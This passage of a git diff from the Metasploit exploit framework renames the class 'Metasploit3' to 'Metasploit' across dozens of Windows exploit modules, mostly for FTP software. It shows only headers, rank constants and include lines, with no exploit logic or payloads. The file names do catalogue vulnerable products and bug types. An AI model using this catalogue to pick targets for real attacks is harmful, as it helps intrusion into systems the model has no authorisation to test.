b/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb index a70e7da10a..1a5207fa8d 100644 --- a/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb +++ b/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb index d3a93a3cfa..d42815f200 100644 --- a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb +++ b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/firewall/blackice_pam_icq.rb b/modules/exploits/windows/firewall/blackice_pam_icq.rb index b2aa38f375..1e68f75037 100644 --- a/modules/exploits/windows/firewall/blackice_pam_icq.rb +++ b/modules/exploits/windows/firewall/blackice_pam_icq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/firewall/kerio_auth.rb b/modules/exploits/windows/firewall/kerio_auth.rb index 09ec293453..710d44f7cf 100644 --- a/modules/exploits/windows/firewall/kerio_auth.rb +++ b/modules/exploits/windows/firewall/kerio_auth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ftp/32bitftp_list_reply.rb b/modules/exploits/windows/ftp/32bitftp_list_reply.rb index 88764b31c3..07c9870188 100644 --- a/modules/exploits/windows/ftp/32bitftp_list_reply.rb +++ b/modules/exploits/windows/ftp/32bitftp_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb index 6ae2f48820..771b645492 100644 --- a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb +++ b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/aasync_list_reply.rb b/modules/exploits/windows/ftp/aasync_list_reply.rb index 86675200e1..32e88c51c2 100644 --- a/modules/exploits/windows/ftp/aasync_list_reply.rb +++ b/modules/exploits/windows/ftp/aasync_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/ability_server_stor.rb b/modules/exploits/windows/ftp/ability_server_stor.rb index da254de1d6..06e5488556 100644 --- a/modules/exploits/windows/ftp/ability_server_stor.rb +++ b/modules/exploits/windows/ftp/ability_server_stor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb b/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb index c740472f19..4e9a4dfe14 100644 --- a/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb +++ b/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/cesarftp_mkd.rb b/modules/exploits/windows/ftp/cesarftp_mkd.rb index 0026fb5b96..609d14f46a 100644 --- a/modules/exploits/windows/ftp/cesarftp_mkd.rb +++ b/modules/exploits/windows/ftp/cesarftp_mkd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb index ae905a9acd..fe83cf265e 100644 --- a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb +++ b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ftp/dreamftp_format.rb b/modules/exploits/windows/ftp/dreamftp_format.rb index 2c2707a2c7..7dde997c22 100644 --- a/modules/exploits/windows/ftp/dreamftp_format.rb +++ b/modules/exploits/windows/ftp/dreamftp_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ftp/easyfilesharing_pass.rb b/modules/exploits/windows/ftp/easyfilesharing_pass.rb index 6223524b5b..65dfa4ac67 100644 --- a/modules/exploits/windows/ftp/easyfilesharing_pass.rb +++ b/modules/exploits/windows/ftp/easyfilesharing_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb index db15f4a362..312f8c0dad 100644 --- a/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/easyftp_list_fixret.rb b/modules/exploits/windows/ftp/easyftp_list_fixret.rb index 07c9cb90fc..68018a1bcf 100644 --- a/modules/exploits/windows/ftp/easyftp_list_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_list_fixret.rb @@ -14,7 +14,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb index 7991c3fe5c..6117c07d51 100644 --- a/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb +++ b/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/filecopa_list_overflow.rb b/modules/exploits/windows/ftp/filecopa_list_overflow.rb index d876af7908..239d3850af 100644 --- a/modules/exploits/windows/ftp/filecopa_list_overflow.rb +++ b/modules/exploits/windows/ftp/filecopa_list_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/filewrangler_list_reply.rb b/modules/exploits/windows/ftp/filewrangler_list_reply.rb index 2757eadf85..68bba29d46 100644 --- a/modules/exploits/windows/ftp/filewrangler_list_reply.rb +++ b/modules/exploits/windows/ftp/filewrangler_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/freefloatftp_wbem.rb b/modules/exploits/windows/ftp/freefloatftp_wbem.rb index ab833037cc..ba5b9b10a6 100644 --- a/modules/exploits/windows/ftp/freefloatftp_wbem.rb +++ b/modules/exploits/windows/ftp/freefloatftp_wbem.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/freeftpd_pass.rb b/modules/exploits/windows/ftp/freeftpd_pass.rb index d39a39495b..57a745e99b 100644 --- a/modules/exploits/windows/ftp/freeftpd_pass.rb +++ b/modules/exploits/windows/ftp/freeftpd_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/freeftpd_user.rb b/modules/exploits/windows/ftp/freeftpd_user.rb index ff40940d5e..a2542ab76a 100644 --- a/modules/exploits/windows/ftp/freeftpd_user.rb +++ b/modules/exploits/windows/ftp/freeftpd_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb b/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb index 68b913acbc..a358baa07f 100644 --- a/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb +++ b/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/ftppad_list_reply.rb b/modules/exploits/windows/ftp/ftppad_list_reply.rb index f8fc0893db..f3488e7698 100644 --- a/modules/exploits/windows/ftp/ftppad_list_reply.rb +++ b/modules/exploits/windows/ftp/ftppad_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb index 4f8df2009c..b3fca70ba1 100644 --- a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb +++ b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/ftpsynch_list_reply.rb b/modules/exploits/windows/ftp/ftpsynch_list_reply.rb index 91809dba78..fd5b073d17 100644 --- a/modules/exploits/windows/ftp/ftpsynch_list_reply.rb +++ b/modules/exploits/windows/ftp/ftpsynch_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/gekkomgr_list_reply.rb b/modules/exploits/windows/ftp/gekkomgr_list_reply.rb index 754d9afd7e..1f2717ac19 100644 --- a/modules/exploits/windows/ftp/gekkomgr_list_reply.rb +++ b/modules/exploits/windows/ftp/gekkomgr_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/globalscapeftp_input.rb b/modules/exploits/windows/ftp/globalscapeftp_input.rb index 497c2049ad..24a4d89f44 100644 --- a/modules/exploits/windows/ftp/globalscapeftp_input.rb +++ b/modules/exploits/windows/ftp/globalscapeftp_input.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/goldenftp_pass_bof.rb b/modules/exploits/windows/ftp/goldenftp_pass_bof.rb index e90f25e4ba..a2e2bf1ba3 100644 --- a/modules/exploits/windows/ftp/goldenftp_pass_bof.rb +++ b/modules/exploits/windows/ftp/goldenftp_pass_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/httpdx_tolog_format.rb b/modules/exploits/windows/ftp/httpdx_tolog_format.rb index 5adb8fc2fb..22bcde6671 100644 --- a/modules/exploits/windows/ftp/httpdx_tolog_format.rb +++ b/modules/exploits/windows/ftp/httpdx_tolog_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/kmftp_utility_cwd.rb b/modules/exploits/windows/ftp/kmftp_utility_cwd.rb index 2799facccc..061359055e 100644 --- a/modules/exploits/windows/ftp/kmftp_utility_cwd.rb +++ b/modules/exploits/windows/ftp/kmftp_utility_cwd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/leapftp_list_reply.rb b/modules/exploits/windows/ftp/leapftp_list_reply.rb index a27b61a9ed..3c7ee51a86 100644 --- a/modules/exploits/windows/ftp/leapftp_list_reply.rb +++ b/modules/exploits/windows/ftp/leapftp_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb index b1b03bb545..62ff62deeb 100644 --- a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb +++ b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb b/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb index 9345aca081..0fc8c699d7 100644 --- a/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb +++ b/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/netterm_netftpd_user.rb b/modules/exploits/windows/ftp/netterm_netftpd_user.rb index e1404937dd..3820169c28 100644 --- a/modules/exploits/windows/ftp/netterm_netftpd_user.rb +++ b/modules/exploits/windows/ftp/netterm_netftpd_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/odin_list_reply.rb b/modules/exploits/windows/ftp/odin_list_reply.rb index 5d672e54ec..473769b50b 100644 --- a/modules/exploits/windows/ftp/odin_list_reply.rb +++ b/modules/exploits/windows/ftp/odin_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/open_ftpd_wbem.rb b/modules/exploits/windows/ftp/open_ftpd_wbem.rb index 53fd3231d5..0b4aab380b 100644 --- a/modules/exploits/windows/ftp/open_ftpd_wbem.rb +++ b/modules/exploits/windows/ftp/open_ftpd_wbem.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb index 6bd6afcda3..881fb96afd 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb index 99b39220b0..6553c50434 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/pcman_stor.rb b/modules/exploits/windows/ftp/pcman_stor.rb index 10ea810e86..b018a96601 100644 --- a/modules/exploits/windows/ftp/pcman_stor.rb +++ b/modules/exploits/windows/ftp/pcman_stor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/proftp_banner.rb b/modules/exploits/windows/ftp/proftp_banner.rb index 91cf132b9e..903911ce7c 100644 --- a/modules/exploits/windows/ftp/proftp_banner.rb +++ b/modules/exploits/windows/ftp/proftp_banner.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/quickshare_traversal_write.rb b/modules/exploits/windows/ftp/quickshare_traversal_write.rb index 043b6c2ccf..a7a8129046 100644 --- a/modules/exploits/windows/ftp/quickshare_traversal_write.rb +++ b/modules/exploits/windows/ftp/quickshare_traversal_write.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/ricoh_dl_bof.rb b/modules/exploits/windows/ftp/ricoh_dl_bof.rb index 2977243b78..9ebf010ee7 100644 --- a/modules/exploits/windows/ftp/ricoh_dl_bof.rb +++ b/modules/exploits/windows/ftp/ricoh_dl_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/sami_ftpd_user.rb b/modules/exploits/windows/ftp/sami_ftpd_user.rb index 48bdbf0d8a..dafd35011a 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_user.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_user.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ftp/sasser_ftpd_port.rb b/modules/exploits/windows/ftp/sasser_ftpd_port.rb index 0499103f04..33ec7e87e6 100644 --- a/modules/exploits/windows/ftp/sasser_ftpd_port.rb +++ b/modules/exploits/windows/ftp/sasser_ftpd_port.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/scriptftp_list.rb b/modules/exploits/windows/ftp/scriptftp_list.rb index 0c8492f50e..8c2af167c9 100644 --- a/modules/exploits/windows/ftp/scriptftp_list.rb +++ b/modules/exploits/windows/ftp/scriptftp_list.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/seagull_list_reply.rb b/modules/exploits/windows/ftp/seagull_list_reply.rb index eaf8b779f9..3e6d644019 100644 --- a/modules/exploits/windows/ftp/seagull_list_reply.rb +++ b/modules/exploits/windows/ftp/seagull_list_reply.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/windows/ftp/servu_chmod.rb b/modules/exploits/windows/ftp/servu_chmod.rb index 3439995d2c..19b893d8f3 100644 --- a/modules/exploits/windows/ftp/servu_chmod.rb +++ b/modules/exploits/windows/ftp/servu_chmod.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/ftp/servu_mdtm.rb b/modules/exploits/windows/ftp/servu_mdtm.rb index 75c3f1fa63..67f58d88ae 100644 --- a/modules/exploits/windows/ftp/servu_mdtm.rb +++ b/modules/exploits/windows/ftp/servu_mdtm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/slimftpd_list_concat.rb b/modules/exploits/windows/ftp/slimftpd_list_concat.rb index dca878528b..d755614ee0 100644 --- a/modules/exploits/windows/ftp/slimftpd_list_concat.rb +++ b/modules/exploits/windows/ftp/slimftpd_list_concat.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/trellian_client_pasv.rb b/modules/exploits/windows/ftp/trellian_client_pasv.rb index de59a26cc6..9cfa5a5b04 100644 --- a/modules/exploits/windows/ftp/trellian_client_pasv.rb +++ b/modules/exploits/windows/ftp/trellian_client_pasv.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/turboftp_port.rb b/modules/exploits/windows/ftp/turboftp_port.rb index 92ff75127d..2399cc9b04 100644 --- a/modules/exploits/windows/ftp/turboftp_port.rb +++ b/modules/exploits/windows/ftp/turboftp_port.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb index b587adc4f6..e9c9c611e8 100644 --- a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb +++ b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/warftpd_165_pass.rb b/modules/exploits/windows/ftp/warftpd_165_pass.rb index 1b8205a688..4d4caf6b57 100644 --- a/modules/exploits/windows/ftp/warftpd_165_pass.rb +++ b/modules/exploits/windows/ftp/warftpd_165_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/warftpd_165_user.rb b/modules/exploits/windows/ftp/warftpd_165_user.rb index 3dbe048b51..6001ade7bd 100644 --- a/modules/exploits/windows/ftp/warftpd_165_user.rb +++ b/modules/exploits/windows/ftp/warftpd_165_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/wftpd_size.rb b/modules/exploits/windows/ftp/wftpd_size.rb index 1542008c2b..56a2ab06f0 100644 --- a/modules/exploits/windows/ftp/wftpd_size.rb +++ b/modules/exploits/windows/ftp/wftpd_size.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb index edefcd67a2..3722a11707 100644 --- a/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb +++ b/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote include Msf::Exploit::CmdStager include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb index d5bcefe4af..464c8b9dfa 100644 --- a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb +++ b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb index aef6f65f7d..b7d5384e87 100644 --- a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb +++ b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/ftp/xftp_client_pwd.rb b/modules/exploits/windows/ftp/xftp_client_pwd.rb index e4a300eca7..892ae0dcf5 100644 --- a/modules/exploits/windows/ftp/xftp_client_pwd.rb +++ b/modules/exploits/windows/ftp/xftp_client_pwd.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/xlink_client.rb b/modules/exploits/windows/ftp/xlink_client.rb index 3ae6ee1c56..43aacffa6d 100644 --- a/modules/exploits/windows/ftp/xlink_client.rb +++ b/modules/exploits/windows/ftp/xlink_client.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ftp/xlink_server.rb b/modules/exploits/windows/ftp/xlink_server.rb index 3b3d16a5ae..4ef4b5f3c0 100644 --- a/modules/exploits/windows/ftp/xlink_server.rb +++ b/modules/exploits/windows/ftp/xlink_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/windows/games/mohaa_getinfo.rb b/modules/exploits/windows/games/mohaa_getinfo.rb index 406afdf4dc..e87f4c3e93 100644 --- a/modules/exploits/windows/games/mohaa_getinfo.rb +++ b/modules/exploits/windows/games/mohaa_getinfo.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < 